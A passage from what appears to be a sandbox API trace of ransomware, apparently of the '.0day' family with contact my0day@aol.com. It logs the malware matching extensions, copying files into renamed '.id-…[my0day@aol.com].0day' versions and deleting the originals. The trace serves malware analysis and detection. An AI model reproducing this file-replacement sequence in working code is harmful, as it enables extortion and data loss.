(lpString=".rar") returned 4 [0041.262] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.262] lstrlenW (lpString=".bz2") returned 4 [0041.262] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.262] lstrlenW (lpString=".7z") returned 3 [0041.262] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.262] lstrlenW (lpString=".dbf") returned 4 [0041.262] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.262] lstrlenW (lpString=".1cd") returned 4 [0041.262] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.262] lstrlenW (lpString=".jpg") returned 4 [0041.262] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.262] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0041.262] lstrlenW (lpString="PHONE.XML") returned 9 [0041.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.263] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1844) returned 1 [0041.263] CloseHandle (hObject=0x1f4) returned 1 [0041.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 0x20 [0041.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.263] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.263] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0041.264] GetLastError () returned 0x0 [0041.264] ReadFile (in: hFile=0x1f4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x734, lpOverlapped=0x0) returned 1 [0041.265] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x740, lpOverlapped=0x0) returned 1 [0041.266] ReadFile (in: hFile=0x1f4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.266] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.266] SetEndOfFile (hFile=0x204) returned 1 [0041.266] CloseHandle (hObject=0x204) returned 1 [0041.267] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.267] SetEndOfFile (hFile=0x1f4) returned 1 [0041.267] CloseHandle (hObject=0x1f4) returned 1 [0041.268] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.268] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 1 [0041.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.268] lstrlenW (lpString=".doc") returned 4 [0041.268] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.268] lstrlenW (lpString=".docx") returned 5 [0041.268] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0041.268] lstrlenW (lpString=".pdf") returned 4 [0041.268] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.268] lstrlenW (lpString=".xls") returned 4 [0041.268] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.268] lstrlenW (lpString=".xlsx") returned 5 [0041.268] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0041.268] lstrlenW (lpString=".ppt") returned 4 [0041.268] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.268] lstrlenW (lpString=".zip") returned 4 [0041.268] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.268] lstrlenW (lpString=".rar") returned 4 [0041.268] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.268] lstrlenW (lpString=".bz2") returned 4 [0041.269] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".7z") returned 3 [0041.269] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.269] lstrlenW (lpString=".dbf") returned 4 [0041.269] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.269] lstrlenW (lpString=".1cd") returned 4 [0041.269] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.269] lstrlenW (lpString=".jpg") returned 4 [0041.269] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.269] lstrlenW (lpString=".doc") returned 4 [0041.269] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".docx") returned 5 [0041.269] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0041.269] lstrlenW (lpString=".pdf") returned 4 [0041.269] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".xls") returned 4 [0041.269] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".xlsx") returned 5 [0041.269] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0041.269] lstrlenW (lpString=".ppt") returned 4 [0041.269] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.269] lstrlenW (lpString=".zip") returned 4 [0041.269] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.269] lstrlenW (lpString=".rar") returned 4 [0041.269] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".bz2") returned 4 [0041.269] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.269] lstrlenW (lpString=".7z") returned 3 [0041.270] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.270] lstrlenW (lpString=".dbf") returned 4 [0041.270] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.270] lstrlenW (lpString=".1cd") returned 4 [0041.270] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.270] lstrlenW (lpString=".jpg") returned 4 [0041.270] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.270] lstrcmpiW (lpString1=".DAT", lpString2=".0day") returned 1 [0041.270] lstrlenW (lpString="STOCKS.DAT") returned 10 [0041.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.557] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=39017) returned 1 [0041.557] CloseHandle (hObject=0x208) returned 1 [0041.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 0x20 [0041.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.558] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.558] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0041.558] GetLastError () returned 0x0 [0041.558] ReadFile (in: hFile=0x208, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x9869, lpOverlapped=0x0) returned 1 [0041.560] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x9870, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x9870, lpOverlapped=0x0) returned 1 [0041.562] ReadFile (in: hFile=0x208, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.562] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0041.562] SetEndOfFile (hFile=0x16c) returned 1 [0041.562] CloseHandle (hObject=0x16c) returned 1 [0041.563] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.563] SetEndOfFile (hFile=0x208) returned 1 [0041.564] CloseHandle (hObject=0x208) returned 1 [0041.564] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.564] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 1 [0041.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.565] lstrlenW (lpString=".doc") returned 4 [0041.565] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0041.565] lstrlenW (lpString=".docx") returned 5 [0041.565] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1 [0041.565] lstrlenW (lpString=".pdf") returned 4 [0041.565] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0041.565] lstrlenW (lpString=".xls") returned 4 [0041.565] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0041.565] lstrlenW (lpString=".xlsx") returned 5 [0041.565] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1 [0041.565] lstrlenW (lpString=".ppt") returned 4 [0041.565] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0041.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.565] lstrlenW (lpString=".zip") returned 4 [0041.565] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0041.565] lstrlenW (lpString=".rar") returned 4 [0041.565] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0041.565] lstrlenW (lpString=".bz2") returned 4 [0041.565] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0041.565] lstrlenW (lpString=".7z") returned 3 [0041.565] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0041.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.565] lstrlenW (lpString=".dbf") returned 4 [0041.565] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0041.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.565] lstrlenW (lpString=".1cd") returned 4 [0041.565] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0041.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.565] lstrlenW (lpString=".jpg") returned 4 [0041.565] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0041.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.566] lstrlenW (lpString=".doc") returned 4 [0041.566] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0041.566] lstrlenW (lpString=".docx") returned 5 [0041.566] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1 [0041.566] lstrlenW (lpString=".pdf") returned 4 [0041.566] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0041.566] lstrlenW (lpString=".xls") returned 4 [0041.566] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0041.566] lstrlenW (lpString=".xlsx") returned 5 [0041.566] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1 [0041.566] lstrlenW (lpString=".ppt") returned 4 [0041.566] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0041.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.566] lstrlenW (lpString=".zip") returned 4 [0041.566] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0041.566] lstrlenW (lpString=".rar") returned 4 [0041.566] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0041.566] lstrlenW (lpString=".bz2") returned 4 [0041.566] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0041.566] lstrlenW (lpString=".7z") returned 3 [0041.566] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0041.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.566] lstrlenW (lpString=".dbf") returned 4 [0041.566] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0041.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.566] lstrlenW (lpString=".1cd") returned 4 [0041.566] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0041.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.566] lstrlenW (lpString=".jpg") returned 4 [0041.566] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0041.567] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0041.567] lstrlenW (lpString="STOCKS.XML") returned 10 [0041.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.567] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2687) returned 1 [0041.567] CloseHandle (hObject=0x208) returned 1 [0041.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 0x20 [0041.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.567] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.567] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0041.568] GetLastError () returned 0x0 [0041.568] ReadFile (in: hFile=0x208, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xa7f, lpOverlapped=0x0) returned 1 [0041.569] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xa80, lpOverlapped=0x0) returned 1 [0041.570] ReadFile (in: hFile=0x208, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.570] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0041.570] SetEndOfFile (hFile=0x16c) returned 1 [0041.570] CloseHandle (hObject=0x16c) returned 1 [0041.571] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.571] SetEndOfFile (hFile=0x208) returned 1 [0041.572] CloseHandle (hObject=0x208) returned 1 [0041.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.572] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 1 [0041.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.572] lstrlenW (lpString=".doc") returned 4 [0041.572] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.572] lstrlenW (lpString=".docx") returned 5 [0041.572] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0041.572] lstrlenW (lpString=".pdf") returned 4 [0041.573] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.573] lstrlenW (lpString=".xls") returned 4 [0041.573] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.573] lstrlenW (lpString=".xlsx") returned 5 [0041.573] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0041.573] lstrlenW (lpString=".ppt") returned 4 [0041.573] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.573] lstrlenW (lpString=".zip") returned 4 [0041.573] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.573] lstrlenW (lpString=".rar") returned 4 [0041.573] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.573] lstrlenW (lpString=".bz2") returned 4 [0041.573] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.573] lstrlenW (lpString=".7z") returned 3 [0041.573] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.573] lstrlenW (lpString=".dbf") returned 4 [0041.573] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.573] lstrlenW (lpString=".1cd") returned 4 [0041.573] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.573] lstrlenW (lpString=".jpg") returned 4 [0041.573] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.573] lstrlenW (lpString=".doc") returned 4 [0041.573] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.573] lstrlenW (lpString=".docx") returned 5 [0041.573] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0041.573] lstrlenW (lpString=".pdf") returned 4 [0041.573] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.574] lstrlenW (lpString=".xls") returned 4 [0041.574] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.574] lstrlenW (lpString=".xlsx") returned 5 [0041.574] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0041.574] lstrlenW (lpString=".ppt") returned 4 [0041.574] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.574] lstrlenW (lpString=".zip") returned 4 